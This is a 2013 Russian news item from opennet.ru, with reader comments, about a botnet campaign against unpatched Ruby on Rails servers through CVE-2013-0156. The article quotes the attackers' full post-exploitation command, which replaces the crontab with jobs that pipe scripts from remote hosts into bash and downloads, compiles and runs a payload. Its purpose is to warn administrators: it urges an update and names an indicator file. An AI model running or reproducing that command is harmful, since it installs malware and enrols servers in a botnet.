Зафиксирована массовая атака на уязвимые версии Ruby on Rails

31.05.2013 10:44

В Сети зафиксирована массовая атака на сайты, использующие устаревшие выпуски фреймворка Ruby on Rails, содержащие неисправленную уязвимость CVE-2013-0156. Несмотря на то, что обновление Ruby on Rails с исправлением уязвимости было представлено ещё в январе, остаётся достаточно много систем не установивших обновление и остающихся уязвимыми. Этим и воспользовались злоумышленники, намеренные сформировать новый ботнет на базе таких систем.

После эксплуатации уязвимости на сервер устанавливается специальная вредоносная программа, принимающая управляющие команды через IRC (используется канал #rails на сервере cvv4you.ru). В списке процессов вредоносная программа выглядит как "-- bash". Загрузка вредоносного ПО активируется через Cron. После получения доступа к атакованной системе, на ней выполняется следующий код (загрузка и сборка приложения k.c):


crontab -r; echo \\"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены свежие выпуски фреймворка 3.2.13, 3.1.12 или 2.3.18. Проверить активность вредоносного приложения можно по наличию файла /tmp/tan.pid.

исправить +3 +/–

Лицензия: CC BY 3.0

Короткая ссылка: https://opennet.ru/37064-rubyonrails

Ключевые слова: rubyonrails

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (26)

1.1, Анонимусссссс (?), 10:49, 31/05/2013 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Ай, спасибо, добрый человек. *Убежал проверяться.

2.17, Аноним (-), 15:13, 31/05/2013 [^] [^^] [^^^] [ответить]	+3 +/–
Не читаешь сесуриту рассылку и держишь компилятор на сервере? ай ай ай

3.19, Аноним (-), 17:17, 31/05/2013 [^] [^^] [^^^] [ответить]	–2 +/–
"сесуриту" ? А это в куда?

3.23, zombardeer (?), 21:19, 31/05/2013 [^] [^^] [^^^] [ответить]	–1 +/–
отсутствие компилятора на сервере... как элемент защиты. виндовсятник?

4.27, Куяврик (?), 14:47, 01/06/2013 [^] [^^] [^^^] [ответить]	+/–
> отсутствие компилятора на сервере... как элемент защиты. виндовсятник? скорее убунтоид, если разница кого-то волнует

1.2, Аноним (-), 11:11, 31/05/2013 [ответить] [﹢﹢﹢] [ · · · ]	–11 +/–
под_linux_нету_вирусов.jpg

2.3, scorry (ok), 11:18, 31/05/2013 [^] [^^] [^^^] [ответить]	+4 +/–
Ещё один из разряда «прочитал всё, не понял ни одной буквы».

3.5, ВовкаОсиист (ok), 11:42, 31/05/2013 [^] [^^] [^^^] [ответить]	+3 +/–
Да тут врятли дальше заголовка пошло дело.

2.10, Аноним (-), 13:12, 31/05/2013 [^] [^^] [^^^] [ответить]	+/–
Это ж не вирус :) Резидентный вирусов, как в винде, под Линукс/BSD и правда нету.

3.21, XoRe (ok), 18:06, 31/05/2013 [^] [^^] [^^^] [ответить]	+/–
> Это ж не вирус :) Резидентный вирусов, как в винде, под Линукс/BSD > и правда нету. Вообще есть) Но они очень редки, в пересчете на количество пользователей/серверов. И чаще это руткиты.

2.24, Аноним (-), 09:49, 01/06/2013 [^] [^^] [^^^] [ответить]	+/–
Определение вируса (заодним и других зловредов) хоть в Википедии прочитай и заучи наизусть как устав караульной службы, если суть запомнить не можешь. Может, тебе это поможет не позориться на компьютерных форумах.

1.4, тигар (ok), 11:22, 31/05/2013 [ответить] [﹢﹢﹢] [ · · · ]	–1 +/–
они поломали хетзнир? --2013-05-31 10:21:32-- http://88.198.20.247/k.c Connecting to 88.198.20.247:80... connected. HTTP request sent, awaiting response... и тишина...

2.8, xdsl (?), 12:55, 31/05/2013 [^] [^^] [^^^] [ответить]	+/–
У тебя неправильный юзерагент

3.9, тигар (ok), 12:59, 31/05/2013 [^] [^^] [^^^] [ответить]	–1 +/–
> У тебя неправильный юзерагент что-то я не заметил в том cronjob левого UA

4.12, Аноним (-), 13:31, 31/05/2013 [^] [^^] [^^^] [ответить]	+/–
User-Agent: Wget/1.13.4 (linux-gnu)

5.14, тигар (ok), 14:01, 31/05/2013 [^] [^^] [^^^] [ответить]	–1 +/–
[tiger@laptop]:~%wget --user-agent="Wget/1.13.4 (linux-gnu)" http://88.198.20.247/k.c --2013-05-31 13:00:31-- http://88.198.20.247/k.c HTTP request sent, awaiting response... 504 Gateway Time-out 2013-05-31 13:03:31 ERROR 504: Gateway Time-out.

6.16, Аноним (-), 15:02, 31/05/2013 [^] [^^] [^^^] [ответить]	+/–
уже прикрыли хосты и айпи

3.13, Аноним (-), 13:52, 31/05/2013 [^] [^^] [^^^] [ответить]	+/–
ТолстОта

1.6, ано2анон (?), 12:42, 31/05/2013 [ответить] [﹢﹢﹢] [ · · · ]	–2 +/–
Что то по тенденции руби напоминает друшлак :D

2.11, Аноним (-), 13:18, 31/05/2013 [^] [^^] [^^^] [ответить]	+6 +/–
Как и всё, что админы поставили и оставили без внимания на длительное время.

3.25, Аноним (-), 09:51, 01/06/2013 [^] [^^] [^^^] [ответить]	+/–
> Как и всё, что админы поставили и оставили без внимания на длительное > время. А если админа контрора берет только для внедрения, а потом фактически засылает его?

2.18, GentooBoy (ok), 16:07, 31/05/2013 [^] [^^] [^^^] [ответить]	+2 +/–
причем тут руби? говориться про рельсы http://www.cvedetails.com/vulnerability-list/vendor_id-10199/product_id-18211

3.20, robux (ok), 17:34, 31/05/2013 [^] [^^] [^^^] [ответить]	+/–
Он не знает что такое руби. Да похоже и рельсы не знает что такое.

1.7, Аноним (-), 12:50, 31/05/2013 [ответить] [﹢﹢﹢] [ · · · ]	+2 +/–
>Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены gcc

2.26, Аноним (-), 09:53, 01/06/2013 [^] [^^] [^^^] [ответить]	+/–
>>Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены > gcc Прикинь, если выставленные наружу виндовые сервера (нам пытались такую технологию впарить). Такому серверу ничто не угрожает ... минут 15. Потом пипец.

1.28, бедный буратино (ok), 16:58, 01/06/2013 [ответить] [﹢﹢﹢] [ · · · ]	+/–
https://jira.mongodb.org/browse/PYTHON-532

игнорирование участников | лог модерирования

Добавить комментарий

Текст: